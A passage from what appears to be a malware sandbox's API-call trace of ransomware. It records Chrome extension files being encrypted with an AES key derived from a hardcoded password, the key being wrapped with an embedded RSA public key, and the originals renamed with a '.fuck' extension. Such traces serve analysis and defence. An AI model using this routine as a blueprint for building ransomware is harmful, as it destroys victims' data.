Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg")) returned 1 [0262.040] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.fuck")) returned 1 [0262.041] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0262.041] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0262.041] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.041] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0262.041] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0262.041] GetLastError () returned 0x0 [0262.041] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js")) returned 0x20 [0262.042] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js", dwFileAttributes=0x80) returned 1 [0262.042] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0262.043] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.044] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.gsg", dwFileAttributes=0x2) returned 1 [0262.044] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0262.046] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0262.046] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.046] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.046] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc00) returned 1 [0262.046] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.046] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0262.046] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72ad0) returned 1 [0262.047] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72ad0, dwCertEncodingType=0x1, pInfo=0x2eab2d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab300*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab308*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7dc40) returned 1 [0262.047] CryptEncrypt (in: hKey=0x2e7dc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0262.047] CryptEncrypt (in: hKey=0x2e7dc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72d78*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72d78*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0262.047] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72d78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72d78*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0262.048] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.060] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.060] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.068] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.068] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.068] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.068] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.068] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.068] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.068] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.069] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.069] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.069] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.069] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.069] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.069] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.070] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.070] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.070] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.070] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.070] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.071] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.071] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.071] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.071] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.071] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.072] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.072] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.072] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.072] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.072] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.072] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.073] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.073] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.073] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.073] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.073] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 